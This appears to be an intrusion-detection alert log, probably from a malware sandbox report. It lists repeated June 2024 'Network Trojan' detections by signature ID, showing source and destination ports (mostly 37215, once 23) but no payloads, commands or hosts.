                Timestamp:06/14/24-10:44:33.132529
                SID:2829579
                Source Port:56152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792224
                SID:2835222
                Source Port:36548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790792
                SID:2829579
                Source Port:33662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792960
                SID:2829579
                Source Port:37736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943372
                SID:2835222
                Source Port:39682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149329
                SID:2829579
                Source Port:57878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341180
                SID:2829579
                Source Port:59700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014955
                SID:2835222
                Source Port:56026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001487
                SID:2835222
                Source Port:35748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.774863
                SID:2829579
                Source Port:40890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766418
                SID:2835222
                Source Port:49770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242939
                SID:2829579
                Source Port:45990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091652
                SID:2829579
                Source Port:60060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179844
                SID:2829579
                Source Port:53248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978044
                SID:2829579
                Source Port:47362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023956
                SID:2829579
                Source Port:38178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547651
                SID:2829579
                Source Port:34360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074908
                SID:2835222
                Source Port:35658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073403
                SID:2835222
                Source Port:41552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732216
                SID:2835222
                Source Port:47162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687856
                SID:2835222
                Source Port:34784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453815
                SID:2829579
                Source Port:41840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.022183
                SID:2829579
                Source Port:47196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736311
                SID:2829579
                Source Port:47370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016541
                SID:2829579
                Source Port:51454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177325
                SID:2835222
                Source Port:37228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944650
                SID:2835222
                Source Port:45212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846308
                SID:2829579
                Source Port:60164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662725
                SID:2835222
                Source Port:48532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660836
                SID:2829579
                Source Port:44796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421967
                SID:2835222
                Source Port:33884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663769
                SID:2835222
                Source Port:42408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942969
                SID:2835222
                Source Port:50332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641728
                SID:2829579
                Source Port:33690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045578
                SID:2835222
                Source Port:50190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978817
                SID:2829579
                Source Port:54346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776090
                SID:2829579
                Source Port:36896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072725
                SID:2835222
                Source Port:43726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326276
                SID:2835222
                Source Port:47124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367238
                SID:2835222
                Source Port:57304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668883
                SID:2835222
                Source Port:34106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669795
                SID:2829579
                Source Port:54308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055639
                SID:2829579
                Source Port:38088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055042
                SID:2835222
                Source Port:59156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759038
                SID:2829579
                Source Port:44422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019924
                SID:2829579
                Source Port:60244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520637
                SID:2835222
                Source Port:54890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967230
                SID:2829579
                Source Port:49514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243369
                SID:2829579
                Source Port:44996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971743
                SID:2835222
                Source Port:46256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185490
                SID:2835222
                Source Port:49588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689000
                SID:2829579
                Source Port:38864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034471
                SID:2835222
                Source Port:60302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339923
                SID:2835222
                Source Port:39848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132693
                SID:2835222
                Source Port:47508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277655
                SID:2835222
                Source Port:42128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985364
                SID:2835222
                Source Port:57800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073269
                SID:2835222
                Source Port:48030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565084
                SID:2835222
                Source Port:52896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471210
                SID:2829579
                Source Port:48128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025269
                SID:2835222
                Source Port:59892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410658
                SID:2829579
                Source Port:46426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678796
                SID:2829579
                Source Port:34282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940243
                SID:2835222
                Source Port:40170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703434
                SID:2835222
                Source Port:43580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943525
                SID:2835222
                Source Port:46644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368389
                SID:2829579
                Source Port:46662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023910
                SID:2835222
                Source Port:54712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969151
                SID:2829579
                Source Port:56440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941887
                SID:2835222
                Source Port:55472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.896584
                SID:2835222
                Source Port:40304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997466
                SID:2835222
                Source Port:45840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186155
                SID:2829579
                Source Port:60422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201873
                SID:2829579
                Source Port:39774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520371
                SID:2835222
                Source Port:39066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765882
                SID:2835222
                Source Port:58990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968096
                SID:2829579
                Source Port:44238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164500
                SID:2835222
                Source Port:42908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.448120
                SID:2835222
                Source Port:42788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.635610
                SID:2840515
                Source Port:40470
                Destination Port:23
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916265
                SID:2835222
                Source Port:41106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132907
                SID:2835222
                Source Port:52554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980375
                SID:2835222
                Source Port:50842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989512
                SID:2835222
                Source Port:38328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325945
                SID:2835222
                Source Port:37136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030255
                SID:2835222
                Source Port:57016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134949
                SID:2835222
                Source Port:51294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453723
                SID:2829579
                Source Port:53796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979375
                SID:2835222
                Source Port:55114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977014
                SID:2829579
                Source Port:34542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.070971
                SID:2835222
                Source Port:57992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115858
                SID:2835222
                Source Port:36156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364668
                SID:2835222
                Source Port:33596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968427
                SID:2835222
                Source Port:54144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977066
                SID:2835222
                Source Port:42462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369013
                SID:2835222
                Source Port:35644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011987
                SID:2829579
                Source Port:36526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763576
                SID:2829579
                Source Port:42892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646808
                SID:2835222
                Source Port:59744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986427
                SID:2829579
                Source Port:41898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383911
                SID:2835222
                Source Port:33240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012569
                SID:2829579
                Source Port:59414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344538
                SID:2835222
                Source Port:48228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682432
                SID:2829579
                Source Port:50568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180573
                SID:2835222
                Source Port:56256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806718
                SID:2829579
                Source Port:45138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718444
                SID:2835222
                Source Port:49020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342703
                SID:2835222
                Source Port:53574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229661
                SID:2835222
                Source Port:45356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321001
                SID:2835222
                Source Port:58312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726886
                SID:2829579
                Source Port:51572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017476
                SID:2829579
                Source Port:44392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734961
                SID:2835222
                Source Port:37760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879779
                SID:2829579
                Source Port:55104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703102
                SID:2829579
                Source Port:33998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451159
                SID:2829579
                Source Port:34688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472725
                SID:2829579
                Source Port:49414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726303
                SID:2835222
                Source Port:55858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326490
                SID:2829579
                Source Port:55660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366028
                SID:2835222
                Source Port:51090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471269
                SID:2835222
                Source Port:38902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133736
                SID:2829579
                Source Port:34190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452010
                SID:2829579
                Source Port:44402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336824
                SID:2829579
                Source Port:60140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917802
                SID:2829579
                Source Port:46838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452103
                SID:2835222
                Source Port:43484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473551
                SID:2829579
                Source Port:39978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132379
                SID:2829579
                Source Port:51392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001829
                SID:2835222
                Source Port:55468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149876
                SID:2835222
                Source Port:57140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421314
                SID:2835222
                Source Port:44896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859414
                SID:2835222
                Source Port:54120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805097
                SID:2829579
                Source Port:48054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804433
                SID:2835222
                Source Port:58936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971311
                SID:2829579
                Source Port:51168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033115
                SID:2829579
                Source Port:55632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734696
                SID:2829579
                Source Port:42422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666788
                SID:2829579
                Source Port:49684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661477
                SID:2835222
                Source Port:50920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943085
                SID:2829579
                Source Port:49128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678945
                SID:2835222
                Source Port:35998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.728780
                SID:2835222
                Source Port:58858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941317
                SID:2829579
                Source Port:56984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972546
                SID:2835222
                Source Port:57084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979020
                SID:2835222
                Source Port:60654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759298
                SID:2829579
                Source Port:57362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024414
                SID:2829579
                Source Port:40528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763918
                SID:2829579
                Source Port:42910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502966
                SID:2835222
                Source Port:59398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115213
                SID:2835222
                Source Port:39014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980439
                SID:2829579
                Source Port:52564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725096
                SID:2835222
                Source Port:34040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203123
                SID:2835222
                Source Port:55852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878243
                SID:2835222
                Source Port:57050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407321
                SID:2835222
                Source Port:54252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177940
                SID:2829579
                Source Port:52814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226270
                SID:2835222
                Source Port:58148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029377
                SID:2829579
                Source Port:52848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979950
                SID:2829579
                Source Port:56056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149610
                SID:2835222
                Source Port:49904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806247
                SID:2835222
                Source Port:58966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660617
                SID:2829579
                Source Port:42714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381511
                SID:2829579
                Source Port:37158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858343
                SID:2829579
                Source Port:60250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148426
                SID:2829579
                Source Port:52962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273410
                SID:2835222
                Source Port:48870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013264
                SID:2829579
                Source Port:51698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660562
                SID:2829579
                Source Port:51456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274757
                SID:2829579
                Source Port:53606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132062
                SID:2835222
                Source Port:57582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999650
                SID:2835222
                Source Port:45748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670880
                SID:2835222
                Source Port:56690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115090
                SID:2829579
                Source Port:36750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829455
                SID:2829579
                Source Port:53264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033456
                SID:2829579
                Source Port:50540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808748
                SID:2835222
                Source Port:56532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057382
                SID:2835222
                Source Port:47778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277134
                SID:2835222
                Source Port:36366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645839
                SID:2835222
                Source Port:46834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847641
                SID:2835222
                Source Port:36232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000222
                SID:2829579
                Source Port:53498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276827
                SID:2835222
                Source Port:47796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942875
                SID:2835222
                Source Port:60034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847881
                SID:2829579
                Source Port:36072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071753
                SID:2835222
                Source Port:44002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790310
                SID:2829579
                Source Port:53728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150066
                SID:2835222
                Source Port:59692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763393
                SID:2835222
                Source Port:58336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914236
                SID:2835222
                Source Port:43052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.581170
                SID:2829579
                Source Port:40876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646637
                SID:2835222
                Source Port:48538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804913
                SID:2829579
                Source Port:51974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228452
                SID:2835222
                Source Port:60040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277528
                SID:2835222
                Source Port:51986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848203
                SID:2835222
                Source Port:42536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185078
                SID:2829579
                Source Port:41664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277363
                SID:2829579
                Source Port:52596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689316
